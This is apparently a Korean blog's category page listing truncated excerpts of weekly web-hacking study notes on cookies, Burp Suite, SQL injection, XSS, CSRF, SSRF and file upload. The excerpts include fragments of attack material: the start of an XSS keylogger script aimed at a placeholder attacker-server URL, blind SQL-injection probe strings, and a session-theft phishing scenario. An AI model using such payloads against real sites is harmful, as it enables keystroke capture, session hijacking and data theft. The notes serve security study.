해킹/Web Hacking 28

[9주차] 해킹 스터디 정리 - CSRF Token, SSRF, File Upload 공격

CSRF 공격 Remind > 요청이 서버에 날라간다. -WHERE > 모든 요청 -> 컨설턴트 주관 -> "비밀번호 변경" -> 게시판 글을 작성 CSRF (1) GET method > URL > 로그인 한 다음에 볼 수 있는 페이지 (2) POST method > 무조건 XSS 공격 포인트를 찾아야 함 -> 같은 도메인에서. 왜 꼭 같은 도메인?! -> 세션을 이용하기 위해서! 예전에는 공격자 사이트에 접속만 해도 모든 입력 정보를 받을 수 있었다. 최근에는 좀 더 똑똑해져서 도메인 별로 쿠키를 다르게 뿌려준다. (3) Referrer Bypass -> meta (4) CSRF Token -> 요청을 위조할 수 있다. -> XSS 공격이 있다면 Bypass 가능. 게시판이 위 코드를 복붙해서 원하는 ..

해킹/Web Hacking 2023.05.25

[8주차] 해킹 스터디 정리 - XSS Bypass, 대응 방안, CSRF 공격

- XSS Bypass (우회 방법) > Anti XSS Bypass -> Black List 필터링 --> WAF의 기본 속성 (Web Application Firewall) ex ) 글자 제한이 있을 때 미리 짜놓은 스크립트를 준비해놓고 src로 주입가능 [3]대소문자 혼용 그런데 이건 어떻게 공격으로 연결시킬까? POST 방식을 GET방식으로 바꿔서 링크를 딴다. 그 후, 살포해서 공격 가능 keylogger 삽입 KeyLogger 코드 -- XSS Keylogger var keys = ""; var hackUrl = '공격서버 url' document.onkeypress = function(e) { get = window.event?event:e; key = get.keyCode?get.keyCo..

해킹/Web Hacking 2023.05.18

[7주차] 해킹 스터디 정리 - Reflected XSS, DOM XSS

cookie or board=test 5 ) 세션 탈취 코드를 파라미터에 삽입한다. board=test 6 ) 이 코드 URL을 사회공학기법을 이용해 사용자들에게 누르게 하면 사용자의 세션을 탈취할 수 있다. ex ) 연봉 재협상, 긴급공지 등 궁금증을 자극해 눌러볼수 밖에 없게 만듬 -- DOM Based XSS DOM (Document object Model) : 객체를 제어하는 과정에서 발생하는 XSS 공격. DOM은 자바스크립트에서 접근할 수 있도록 각종 API를 제공해 개발자에게 굉장히 편리한 기능인데, 이를 잘못 사용할 경우 XSS나 개발자가 의도한 동작과 다르게 동작시킬 수 있는 취약점이 발생할 수 있다. 이 공격도 서버에 저장 하지 않고 공격하는 기법이면서 서버로 요청을 보내지 않아도 스크..

해킹/Web Hacking 2023.05.13

[6주차] 해킹 스터디 정리 - SQL Injection 복습, XSS

-보고서 > 포트폴리오 1 ) 폰트 통일 ( 스타일, 크기, 색깔.) 제목부분. 본문. -> 글씨 컬러. X -> 볼드체. 굵은 글씨. -> 빨간색.? 2 ) 사진 캡쳐화면 보고서에 쓴 글씨 크기와 캡쳐한 그림의 폰트 크기가 비슷해야 함. 3 ) 풀이 과정 디테일. 코드를 타이핑해서 넣어도 되고 사진으로 보기좋게 넣어도 됨 --------------------------------------------------------- SQL Injection What? -> 임의의 SQL 질의문을 삽입해 실행하는 공격 시나리오 - 인증 우회, 데이터 추출, 변조. + WEB shell. DB : SQL 질의문. file upload. 공격 유형 - UNION - Error Based SQLi - Blind SQL..

해킹/Web Hacking 2023.05.04

[5주차] 스터디 정리 - Blind SQL Injection, 대응 방안

Blind SQL Injection ->DB 결과가 화면에 안 나오는 곳 -> Error based -> SQL Injection이 가능한 모든 곳에서 사용이 가능하다 : SQL 참과 거짓의 조건으로 데이터를 추출하는 기법 보통 Burp Suite 리피터로 옮겨서 작업함 **일어나는 곳. > 참과 거짓 조건에 따라 응답이 다른 곳! > 어떻게든 다르면 됨. overwatch%' and '1%'='1 title like '%_____%' 일부러 overwatch%' and '1%'='2 를 넣어서 일부러 거짓을 유도한다. 그 후, Burp Suite의 Comparer 를 이용해 response를 전체 선택해서 참일 때와 거짓일 때 어떤 부분이 미묘하게 다른지를 볼 수 있다. sync with를 누르면 같이..

해킹/Web Hacking 2023.04.27

[4주차] 스터디 정리 - Union Based, Error Based SQL Injection

* 웹 개발 -> 백엔드 코드가 더 중요함 -> bootstrap이란 좋은 사이트도 있음 -> 문제풀이 write-up 1) 만든 사이트 2 ) flag : 정답만큼은 모자이크하는 게 좋음 -> CTF 문제. : 정답보지 않는다. ------------------------------------------------------------------------------------ ** Review > 로그인 인증 - 식별 / 인증 > SQL Injection : 공격자 SQL 삽입하는 공격 : 데이터 추출도 가능함 ( SELECT ) * SQL Injection 데이터 추출 1 ) SQL 질의문이 화면에 보이는 곳 ex ) 게시판, 회원정보 (마이페이지), 주소 검색, 검색 페이지 등등... -> UNI..

해킹/Web Hacking 2023.04.20

[3주차] 스터디 정리 - SQL Injection

response 패킷도 데이터를 변경할 수 있다 result : fail -> ok로 바꿀 수 있음 script 태그로 감싸진 javascript 코드도 response에서 변경할 수 있음 intercept is on 잡아서 Do intercept -> do response ~~ 클릭하기 브루트 포스 문제 취약점: 로그인 인증 횟수를 제한하고 있지 않음 **유명한 프록시 툴 burp suite - GUI 방식 fiddler (window에서만 돌아감) -> 쓰기 어려움 mitmproxy - CLI 방식 ** SQL ** DB : 엑셀 그 자체임 database ex : 이름 컬럼 / 전화번호 컬럼 / email 컬럼 SELECT id FROM member column : 열 row : 행 2행 3열에 해..

해킹/Web Hacking 2023.04.14

[2주차] 해킹 스터디 정리 - 쿠키,세션,세션ID,Burp Suite 사용법

HTTP : Hypert Text Transfer Protocol 쉽게 말해 통신 양식이다 관공서같은 곳에서 서류 작업을 할 때 제출해야 하는 양식 * 로그인 구현 -HTTP 프로토콜 > "요청" / "응답" HTTP는 로그인 후 다른 작업을 할 때 다시 인증을 받아야 하는 문제가 생긴다. 즉 연결성이 없다. 쿠키 이를 해결하기 위한 것이 쿠키 쿠키는 Set-Cookie를 통해 서버가 포스트잇처럼 client에 넣어주고 다음부터 client가 요청할 때마다 딸려오게 된다. 그럼 서버는 그 쿠키를 보고 사용자임을 알고 추가 인증을 할 필요가 없는 연결성을 부여해줍니다 여기서 취약점이 발생합니다 클라이언트에서 출발한다는 점이 변조가 가능하다는 것이다. mario라는 사용자가 cookie를 변조하여 bokyu..

해킹/Web Hacking 2023.04.06